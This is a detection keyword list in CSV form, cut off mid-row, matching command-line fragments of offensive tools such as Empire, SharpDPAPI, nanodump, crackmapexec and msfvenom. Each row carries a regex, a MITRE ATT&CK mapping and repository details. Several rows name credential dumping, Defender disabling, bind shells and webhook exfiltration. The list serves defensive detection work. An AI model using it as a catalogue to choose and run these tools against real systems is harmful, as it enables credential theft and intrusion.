"* -UserPersistenceOption *",".{0,1000}\s\-UserPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --user-spns*",".{0,1000}\s\-\-user\-spns.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* Use-Waitfor.exe*",".{0,1000}\sUse\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "* utils.ntlmdecode *",".{0,1000}\sutils\.ntlmdecode\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* UUID_bypass.py*",".{0,1000}\sUUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* vaporizer.py *",".{0,1000}\svaporizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* -VaultElementPtr *",".{0,1000}\s\-VaultElementPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* vaults /target:* /pvk:*",".{0,1000}\svaults\s\/target\:.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* ventrilo-info.nse*",".{0,1000}\sventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* versant-info.nse*",".{0,1000}\sversant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*----- VIRTUALALLOC HOOK -----*",".{0,1000}\-\-\-\-\-\sVIRTUALALLOC\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* vmauthd-brute.nse*",".{0,1000}\svmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vmware-version.nse*",".{0,1000}\svmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-brute.nse*",".{0,1000}\svnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-info.nse*",".{0,1000}\svnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-title.nse*",".{0,1000}\svnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* voldemort-info.nse*",".{0,1000}\svoldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Volumiser.exe *",".{0,1000}\sVolumiser\.exe\s.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "* vtam-enum.nse*",".{0,1000}\svtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -vulnerable -stdout -hide-admins*",".{0,1000}\s\-vulnerable\s\-stdout\s\-hide\-admins.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* vulners.nse*",".{0,1000}\svulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vulscan.nse*",".{0,1000}\svulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* vuze-dht-info.nse*",".{0,1000}\svuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -w wordlist/*.txt*http*",".{0,1000}\s\-w\swordlist\/.{0,1000}\.txt.{0,1000}http.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* Waitfor-Persistence.ps1*",".{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "* -watson -Command *",".{0,1000}\s\-watson\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* wcreddump (windows credentials dump)*",".{0,1000}\swcreddump\s\(windows\scredentials\sdump\).{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* wcreddump.py*",".{0,1000}\swcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* wdb-version.nse*",".{0,1000}\swdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --wdigest disable*",".{0,1000}\s\-\-wdigest\sdisable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wdigest enable*",".{0,1000}\s\-\-wdigest\senable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* web-hacking-toolkit *",".{0,1000}\sweb\-hacking\-toolkit\s.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "* weblogic-t3-info.nse*",".{0,1000}\sweblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --werfault *\temp\*",".{0,1000}\s\-\-werfault\s.{0,1000}\\temp\\.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* wget ""https://*/interactshbuild*",".{0,1000}\swget\s\""https\:\/\/.{0,1000}\/interactshbuild.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* whoami > zzz.txt*",".{0,1000}\swhoami\s\>\szzz\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","https://github.com/r00t-3xp10it/redpill","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* whois-domain.nse*",".{0,1000}\swhois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* whois-ip.nse*",".{0,1000}\swhois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* will be obfuscated and integrated in created documents*",".{0,1000}\swill\sbe\sobfuscated\sand\sintegrated\sin\screated\sdocuments.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "* will be written to PME\*",".{0,1000}\swill\sbe\swritten\sto\sPME\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* WinBruteLogon.zip*",".{0,1000}\sWinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* windapsearch.py*",".{0,1000}\swindapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* winDefKiller *",".{0,1000}\swinDefKiller\s.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "* windows/csharp_exe*",".{0,1000}\swindows\/csharp_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* windows/shell/bind_tcp *",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* windows/shell/bind_tcp *shellcode*",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Windows-Passwords.ps1*",".{0,1000}\sWindows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* WINHELLO2hashcat.py*",".{0,1000}\sWINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* WinPEAS - Windows local Privilege Escalation Awesome Script*",".{0,1000}\sWinPEAS\s\-\sWindows\slocal\sPrivilege\sEscalation\sAwesome\sScript.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* -winPEAS *",".{0,1000}\s\-winPEAS\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* WinPirate.bat*",".{0,1000}\sWinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* winrm * -u * -p * --laps*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-laps.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* winrm * -u * -p * -X whoami*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-X\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* winrm.py*",".{0,1000}\swinrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 